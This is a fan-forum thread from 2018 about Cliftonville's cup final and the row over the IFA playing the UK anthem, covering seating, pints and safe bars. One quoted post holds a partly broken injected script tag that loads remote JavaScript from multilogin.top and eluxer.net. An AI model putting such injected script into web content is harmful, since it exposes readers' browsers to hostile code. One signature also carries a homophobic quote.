You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Rest of The World
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Cliftonville Thread

Post Reply Post Reply Page  <1 2728293031 67>
Author
Moderator Group
Moderator Group

Post Options Post Options   Thanks (0) Thanks(0)   Quote Sham157 Quote  Post ReplyReply Direct Link To This Post Posted: 28 Apr 2018 at 4:32pm
currently 2-0 up against Linfield at Lizzie Park.

Goals are here https://www.bbc.com/sport/live/football/43556162 for anyone interested, just scroll down a bit.
Sponsored Links

corkery View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote corkery Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 10:51pm
The UK national anthem is being played on Saturday.

Edited by corkery - 03 May 2018 at 10:51pm
'The younger generation as in 17 -25 are certainly gayer than their predecessors. I think they may cause the extinction of the human race with their activities.'- Baldrick
Roberto Baggio View Drop Down
Robbie Keane
Robbie Keane
UNBELIEVABLE JEFF

Post Options Post Options   Thanks (0) Thanks(0)   Quote Roberto Baggio Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 11:20pm
C’ville fans used to bang the bottom part of the bucket seat up and down creating as much noise as possible when GSTQ was played, in the 90s that was 
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:31pm
stupid from the ifa to be playing it, my young daughter will be with me at the game, ive brought her up to take people as they are, not on their nationality, race, religion etc. I don't think she is aware that there are people out there that will hate on someone because of their background. I am now going to be asked a million and one questions as to why people are shouting and booing during the song. Thus having to explain that there is more than one nationality,culture,flag on this island and the folk annoyed are those that are not represented with their anthem being played in a stadium that's slogan is football for all. I will now wait until the anthem has been played rather than enjoying the build to the game, as I don't have hours to explain the stone age politics in the north to a child.

The anthem should not be played in my opinion, media will be awash with hatred toward cliftonville and the league now. you can bet your life Nolan and Bryson will be on social media and radio first thing on Monday morning discussing this rather than the football and a day which should be a happy fun filled day for families and supporters alike. The idiocy of the IFA is embarrassing. Their showpiece event and they don't have the wit to use common sense.

Edited by PaulB - 04 May 2018 at 1:31pm
Robbie Keane
Robbie Keane
UNBELIEVABLE JEFF

Post Options Post Options   Thanks (0) Thanks(0)   Quote Roberto Baggio Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:37pm
You could come into the ground after the anthem, but that's leaving it tight and missing all the pre match build up.
Where are you sitting Paul?

Any of you in the lower north stand?
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:41pm
Upper tier, Was in the lower tier once tbh the view isn't the best, Its eventsec doing security so itll be easy to blag your way up if youre in early enough. Ill enjoy a pint on the concourse under the north stand while the anthem is on.
Many of you coming up? 
Robbie Keane
Robbie Keane
UNBELIEVABLE JEFF

Post Options Post Options   Thanks (0) Thanks(0)   Quote Roberto Baggio Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:46pm
Originally posted by PaulB PaulB wrote:

Upper tier, Was in the lower tier once tbh the view isn't the best, Its eventsec doing security so itll be easy to blag your way up if youre in early enough. Ill enjoy a pint on the concourse under the north stand while the anthem is on.
Many of you coming up? 

Me and 2 others, we live in Belfast so not far to go. Pints on sale at the stadium?

Tyronebhoy View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote Tyronebhoy Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:47pm
Reds actually requested that it not be played but IFA rejected that. You'll probably be able to hear the boos in Killarney come 2.25pm tomorrow.
Northmen, Southmen, Comrades All
horsebox View Drop Down
Robbie Keane
Robbie Keane
Born n bred in darndale.

Post Options Post Options   Thanks (0) Thanks(0)   Quote horsebox Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:47pm
Chris Donnelly suggesting that the Cliftonville players might do some sort of protest. He didn't really elaborate, might be just talk.

It was far across the sea,
When the devil got a hold of me,
He wouldn't set me free,
So he kept me soul for ransom.
na na na na na na na na na
na na na na na na na na.
I'm a sailor man from Glasgow to
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:51pm
It would be hilarious if they all went down on one knee during it.
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:52pm
Originally posted by Roberto Baggio Roberto Baggio wrote:

Many of you coming up? 

Me and 2 others, we live in Belfast so not far to go. Pints on sale at the stadium?

Yes Tennents as far as im aware. Couldn't bring them to your seat last year though.
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 1:55pm
Originally posted by Tyronebhoy Tyronebhoy wrote:

Reds actually requested that it not be played but IFA rejected that. You'll probably be able to hear the boos in Killarney come 2.25pm tomorrow.

Was stupid of the IFA to release a statement on cliftonvilles request, rather than keep it private. Brings more unwanted attention to that particular part of the day. It doesn't add nothing to the occasion and come 2.20pm they will regret they didn't accept their request, as there will be all sorts sang and shouted through it.  
bogball88 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote bogball88 Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:09pm

You could come into the ground after the anthem, but that's leaving it tight and missing all the pre match build up.

Yeah think I’m in there. Anywhere close to stadium for scoops beforehand?
Robbie Keane
Robbie Keane
UNBELIEVABLE JEFF

Post Options Post Options   Thanks (0) Thanks(0)   Quote Roberto Baggio Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:24pm
Don't think there are any bars on Boucher Road anymore, there was one the last time they were in the final but its closed now. Probably the nearest safest bars would be in Andytown or the Falls
Fintan View Drop Down
Liam Brady
Liam Brady
YBIG Mods are cool

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fintan Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:24pm
Originally posted by bogball88 bogball88 wrote:

Yeah think I’m in there. Anywhere close to stadium for scoops beforehand?

Pints are on sale at the ground, I have checked with the IFA. 
I am in the lower tier, best atmosphere will be in the upper tier, everyone seems desperate to get there so you must get 30 Virgins with pints coming out their titties up there. 
I wouldnt adivse going for Scoops 'nearby' as there will be very few Cliftonville fans about in what us esentially a loyalist ghetto. Head to Falls Road or a nationalist district of North Belfast gor atmosphere and safety.
Nolan and Bryson have already been on about it. Cliftonville are despised anyway so who cares?!? Changes nothing. #RedArmy
bogball88 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote bogball88 Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:27pm

Don't think there are any bars on Boucher Road anymore, there was one the last time they were in the final but its closed now. Probably the nearest safest bars would be in Andytown or the Falls
I’m pushing it for time tomorrow so will probably park up at he Devenish for a few before and jump on the train and get off at Boucher. Looks like it could be decent can weather Big smile
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:34pm

Originally posted by Tyronebhoy Tyronebhoy wrote:

Was stupid of the IFA to release a statement on cliftonvilles request, rather than keep it private. Brings more unwanted attention to that particular part of the day. It doesn't add nothing to the occasion and come 2.20pm they will regret they didn't accept their request, as there will be all sorts sang and shouted through it.  
< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">

It does appear to be the case and does seem strange.  Surely the sensible thing would be to just say nothing.  They must have known it would be a big news story and detract from a showpiece match.

horsebox View Drop Down
Robbie Keane
Robbie Keane
Born n bred in darndale.

Post Options Post Options   Thanks (0) Thanks(0)   Quote horsebox Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 2:45pm
Originally posted by bogball88 bogball88 wrote:

I’m pushing it for time tomorrow so will probably park up at he Devenish for a few before and jump on the train and get off at Boucher. Looks like it could be decent can weather Big smile

What train is that?
It was far across the sea,
When the devil got a hold of me,
He wouldn't set me free,
So he kept me soul for ransom.
na na na na na na na na na
na na na na na na na na.
I'm a sailor man from Glasgow to
 Post Reply Post Reply Page  <1 2728293031 67>
  Share Topic